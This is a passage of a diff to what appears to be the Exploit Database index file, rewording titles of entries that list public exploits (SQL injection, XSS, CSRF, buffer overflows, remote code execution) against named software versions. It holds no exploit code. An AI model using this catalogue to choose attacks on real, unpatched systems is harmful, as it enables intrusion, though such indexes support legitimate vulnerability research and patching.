Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0 36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",php,webapps,0 -36880,platforms/windows/remote/36880.rb,"Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",2015-05-01,Metasploit,windows,remote,0 +36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory",2015-05-01,Metasploit,windows,remote,0 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' Parameter SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 36884,platforms/linux/remote/36884.py,"libpurple 2.8.10 OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote,0 36885,platforms/php/webapps/36885.txt,"Bontq 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps,0 -36886,platforms/php/webapps/36886.txt,"OSQA's CMS Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 +36886,platforms/php/webapps/36886.txt,"OSQA's CMS - Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0 36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - /admin/blogs.php nb Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - /admin/comments.php Multiple Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - /admin/plugin.php page Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 +36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter XSS",2012-02-28,anonymous,php,webapps,0 36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display XSS",2012-02-28,anonymous,php,webapps,0 36895,platforms/php/webapps/36895.txt,"starCMS - 'q' Parameter URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 @@ -33295,7 +33295,7 @@ id,file,description,date,author,platform,type,port 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 -36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 +36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0 36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' Parameter SQL Injection",2012-03-07,"Rob Miller",php,webapps,0 36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x - Directory Traversal / Arbitrary File Upload",2012-03-07,"Filippo Cavallarin",php,webapps,0 @@ -33303,7 +33303,7 @@ id,file,description,date,author,platform,type,port 36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Parameter Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0 36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 -36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' - SQL Injection",2012-03-05,"Colin Wong",php,webapps,0 +36913,platforms/php/webapps/36913.pl,"Joomla! - 'redirect.php' SQL Injection",2012-03-05,"Colin Wong",php,webapps,0 36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0 36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web",2015-05-04,Vulnerability-Lab,ios,webapps,0 36973,platforms/php/webapps/36973.txt,"Gnuboard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0 @@ -33322,9 +33322,9 @@ id,file,description,date,author,platform,type,port 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include",2015-05-06,Vulnerability-Lab,ios,webapps,0 -36925,platforms/php/webapps/36925.py,"elFinder 2 Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 +36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 -36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 +36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow",2012-03-08,"Julien Ahrens",windows,local,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 @@ -33353,13 +33353,13 @@ id,file,description,date,author,platform,type,port 36953,platforms/php/webapps/36953.txt,"SynTail 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - CSRF",2015-05-08,Evex,php,webapps,80 36955,platforms/osx/remote/36955.py,"MacKeeper URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 -36956,platforms/windows/remote/36956.rb,"Adobe Flash Player domainMemory ByteArray Use After Free",2015-05-08,Metasploit,windows,remote,0 +36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0 36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - File Upload and Execute",2015-05-08,Metasploit,php,remote,80 36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - CSRF",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 36961,platforms/php/webapps/36961.txt,"WordPress Ad Inserter Plugin 1.5.2 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 -36962,platforms/windows/remote/36962.rb,"Adobe Flash Player NetConnection Type Confusion",2015-05-08,Metasploit,windows,remote,0 +36962,platforms/windows/remote/36962.rb,"Adobe Flash Player - NetConnection Type Confusion",2015-05-08,Metasploit,windows,remote,0 36963,platforms/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps,0 36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management Arbitrary File Upload",2015-05-08,Metasploit,java,remote,443 36974,platforms/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",cgi,webapps,0 @@ -33398,7 +33398,7 @@ id,file,description,date,author,platform,type,port 37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps,0 37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 - ajaxserver.php Multiple Function SQL Injection",2012-03-27,waraxe,php,webapps,0 37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 - index.php do Parameter XSS",2012-03-27,waraxe,php,webapps,0 -37014,platforms/windows/dos/37014.py,"iFTP 2.21 Buffer OverFlow Crash PoC",2015-05-14,"dogo h@ck",windows,dos,0 +37014,platforms/windows/dos/37014.py,"iFTP 2.21 - Buffer OverFlow Crash PoC",2015-05-14,"dogo h@ck",windows,dos,0 37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting",2012-03-28,sonyy,php,webapps,0 @@ -33420,22 +33420,22 @@ id,file,description,date,author,platform,type,port 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0 -37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 Denial of Service",2012-03-31,r45c4l,linux,dos,0 +37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 - Denial of Service",2012-03-31,r45c4l,linux,dos,0 37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting",2012-04-03,b.saleh,hardware,remote,0 -37038,platforms/php/webapps/37038.txt,"osCMax 2.5 admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37039,platforms/php/webapps/37039.txt,"osCMax 2.5 admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37040,platforms/php/webapps/37040.txt,"osCMax 2.5 admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37041,platforms/php/webapps/37041.txt,"osCMax 2.5 admin/stats_products_purchased.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37042,platforms/php/webapps/37042.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37043,platforms/php/webapps/37043.txt,"osCMax 2.5 admin/stats_customers.php sorted Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37044,platforms/php/webapps/37044.txt,"osCMax 2.5 admin/information_manager.php information_id Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37045,platforms/php/webapps/37045.txt,"osCMax 2.5 admin/geo_zones.php zID Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 -37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37040,platforms/php/webapps/37040.txt,"osCMax 2.5 - admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37041,platforms/php/webapps/37041.txt,"osCMax 2.5 - admin/stats_products_purchased.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37042,platforms/php/webapps/37042.txt,"osCMax 2.5 - admin/stats_monthly_sales.php status Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37043,platforms/php/webapps/37043.txt,"osCMax 2.5 - admin/stats_customers.php sorted Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37044,platforms/php/webapps/37044.txt,"osCMax 2.5 - admin/information_manager.php information_id Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37045,platforms/php/webapps/37045.txt,"osCMax 2.5 - admin/geo_zones.php zID Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37046,platforms/php/webapps/37046.txt,"osCMax 2.5 - admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37047,platforms/php/webapps/37047.html,"osCMax 2.5 - admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37048,platforms/php/webapps/37048.txt,"osCMax 2.5 - admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,php,webapps,0 -37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0 +37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use-After-Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0 37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0 37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal",2015-05-18,pandujar,php,webapps,0 @@ -33443,7 +33443,7 @@ id,file,description,date,author,platform,type,port 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion",2015-05-18,Vulnerability-Lab,ios,webapps,80 37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 -37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF",2015-05-18,"Akash S. Chavan",windows,webapps,0 +37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - CSRF",2015-05-18,"Akash S. Chavan",windows,webapps,0 37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial Of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 - 'announcementid' Parameter SQL Injection",2012-04-04,Am!r,php,webapps,0 37063,platforms/php/webapps/37063.txt,"WordPress TagGator Plugin - 'tagid' Parameter SQL Injection",2012-04-05,Am!r,php,webapps,0 @@ -33467,7 +33467,7 @@ id,file,description,date,author,platform,type,port 37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0 -37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 +37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 - Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 @@ -33506,7 +33506,7 @@ id,file,description,date,author,platform,type,port 37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Parameter Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 37120,platforms/php/webapps/37120.txt,"Uiga FanClub - 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 -37121,platforms/asp/webapps/37121.txt,"BBSXP CMS Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 +37121,platforms/asp/webapps/37121.txt,"BBSXP CMS - Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 @@ -33514,7 +33514,7 @@ id,file,description,date,author,platform,type,port 37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0 -37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 +37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 - filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80 @@ -33532,18 +33532,18 @@ id,file,description,date,author,platform,type,port 37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC templates/hrfunct/emppop.php sortOrder1 Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC index.php uri Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0 -37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 +37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 - Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0 +37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22 37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 - (SEH) BOF",2015-06-04,"Zahid Adeel",windows,local,0 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 -37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 -37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 -37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 -37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 - admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 - admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 - admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 - admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service",2012-05-14,demonalex,windows,dos,0 37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 Plugin - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -33597,7 +33597,7 @@ id,file,description,date,author,platform,type,port 37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 -37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 +37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 and Crucible 2.5.7 Plugins XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 @@ -33608,8 +33608,8 @@ id,file,description,date,author,platform,type,port 37228,platforms/php/webapps/37228.txt,"concrete5 - index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37229,platforms/php/webapps/37229.txt,"concrete5 - index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37230,platforms/php/webapps/37230.txt,"concrete5 - index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 -37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin index.php id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 -37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 +37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - index.php id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 +37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0 37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0 @@ -33621,8 +33621,8 @@ id,file,description,date,author,platform,type,port 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37243,platforms/php/webapps/37243.txt,"WordPress Wp-ImageZoom 1.1.0 Plugin - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 37244,platforms/php/webapps/37244.txt,"WordPress Plugin 'WP Mobile Edition' - LFI",2015-06-08,"Ali Khalil",php,webapps,0 -37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection",2015-06-08,"Sebastian khan",php,webapps,0 -37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 +37245,platforms/php/webapps/37245.txt,"Pasworld - detail.php Blind Sql Injection",2015-06-08,"Sebastian khan",php,webapps,0 +37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 - Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 @@ -33691,8 +33691,8 @@ id,file,description,date,author,platform,type,port 